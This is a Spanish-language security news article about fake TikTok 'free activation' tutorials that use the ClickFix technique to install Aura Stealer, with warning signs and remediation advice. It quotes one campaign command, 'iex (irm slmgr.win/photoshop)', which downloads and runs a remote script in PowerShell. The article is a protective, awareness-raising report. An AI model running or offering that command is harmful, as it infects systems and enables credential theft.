Tutoriales falsos en TikTok: la trampa que instala malware

  • Campaña en TikTok que difunde guías para activar software “gratis” y atraer víctimas.
  • La técnica ClickFix induce a ejecutar comandos de PowerShell con privilegios.
  • Se descargan desde servidores remotos Aura Stealer y otro ejecutable de función incierta.
  • Recomendaciones: no ejecutar comandos de vídeos, cambiar contraseñas y analizar el sistema.

Alertas sobre tutoriales falsos en TikTok

Una ola de vídeos en TikTok promete “activar” Windows, Photoshop o Netflix sin pagar, pero en realidad lleva a que los usuarios ejecuten instrucciones camufladas que acaban instalando malware y cediendo sus datos a delincuentes. Bajo la apariencia de guías técnicas sencillas, los creadores indican pasos que, de seguirse al pie de la letra, abren la puerta a infecciones y robo de credenciales.

Investigadores del SANS Internet Storm Center, entre ellos Xavier Mertens, y medios especializados como BleepingComputer y analistas de Trend Micro, han descrito una campaña coordinada que explota la técnica llamada ClickFix. En esencia, se convence a la víctima para que lance comandos de PowerShell, los cuales conectan con servidores remotos y descargan carga maliciosa alojada incluso en servicios legítimos, como Cloudflare Pages.

Cómo operan los vídeos y la cadena de infección

Técnicas de ClickFix en TikTok

Los clips reproducen el estilo de un tutorial “paso a paso” y usan instrucciones visuales que imitan soporte técnico. El objetivo es que el usuario copie un comando corto, por ejemplo iex (irm slmgr.win/photoshop), y lo ejecute en PowerShell con permisos de administrador. Ese simple gesto, que parece inocente, dispara la descarga de scripts adicionales desde una web controlada por los atacantes.

Una vez ejecutado el primer script, se produce una segunda fase: llegan dos ejecutables al equipo desde la infraestructura remota. De acuerdo con los análisis, uno de ellos corresponde a Aura Stealer, un ladrón de información con capacidad para recolectar datos sensibles; el otro compila o despliega código bajo demanda y su propósito exacto aún no está claro, aunque sugiere funciones de ampliación del ataque o persistencia.

El éxito de la campaña descansa en la sensación de legitimidad que transmiten estos vídeos: comandos “hechos a medida” para cada software, explicaciones breves y un formato que empuja a actuar sin pensar. La combinación de prisa, confianza en el creador y la promesa de conseguir algo “premium” sin coste reduce la alerta del usuario.

Los atacantes aprovechan además la difusión masiva de TikTok. Con pocas piezas de contenido, un perfil recién creado puede acumular miles de visualizaciones, lo que multiplica el alcance de la estafa en cuestión de horas.

Qué datos roban y qué control obtienen

Una vez activo, Aura Stealer se centra en extraer credenciales de inicio de sesión, cookies de autenticación y posibles accesos a carteras de criptomonedas guardadas en navegadores o aplicaciones. Con esa información en manos de los delincuentes, es factible el acceso a servicios como correo, redes sociales o banca.

El segundo ejecutable observado puede actuar como módulo de soporte, ya sea para ampliar capacidades, mantener el acceso o dificultar la eliminación del malware. Los especialistas no descartan que sirva para desplegar componentes adicionales, lo que eleva el riesgo de usos posteriores, como convertir el equipo en parte de una red de bots o facilitar nuevos ataques.

La consecuencia inmediata para quienes siguieron los supuestos “trucos” es clara: contraseñas comprometidas y posible exposición de datos personales y financieros. Además, ejecutar código con privilegios de administrador puede dar control profundo del sistema a terceros.

Señales de alerta y cómo protegerse

Conviene desconfiar de cualquier vídeo que prometa “activar gratis” o “desbloquear” funciones de pago. Indicios como comandos para la terminal, enlaces acortados, descargas fuera de sitios oficiales, perfiles con poca actividad o comentarios deshabilitados son banderas rojas que no se deben ignorar.

  • No copies ni ejecutes comandos vistos en redes sociales, especialmente en PowerShell o terminales con permisos elevados.
  • Utiliza siempre software y licencias legítimas y evita instaladores no verificados o cracks.
  • Mantén el sistema y el antivirus actualizados y activa la verificación en dos pasos en todas tus cuentas.
  • Desconfía de enlaces y descargas fuera de las páginas oficiales del proveedor.

Qué hacer si ya caíste

Si seguiste las instrucciones de uno de estos vídeos, actúa sin demora: cambia todas tus contraseñas (correo, redes, banca, servicios de streaming) desde un dispositivo que consideres limpio y diferente al comprometido.

  • Realiza un análisis completo con soluciones de seguridad actualizadas.
  • Elimina programas o archivos recientes que no reconozcas y, si detectas actividad anómala, desconecta el equipo de la red hasta resolver la infección.
  • Valora la restauración del sistema o la reinstalación si el daño persiste, y habilita 2FA en todos los servicios compatibles.

Por mucho que tienten estas “gangas”, no hay métodos legítimos para obtener software de pago sin licencia. Evitar ejecutar comandos de origen desconocido y limitarse a canales oficiales es, con diferencia, la mejor manera de esquivar estas campañas que se aprovechan del formato veloz y la confianza en TikTok.

Artículo relacionado:
Ética editorial

Añadir como fuente preferida en Google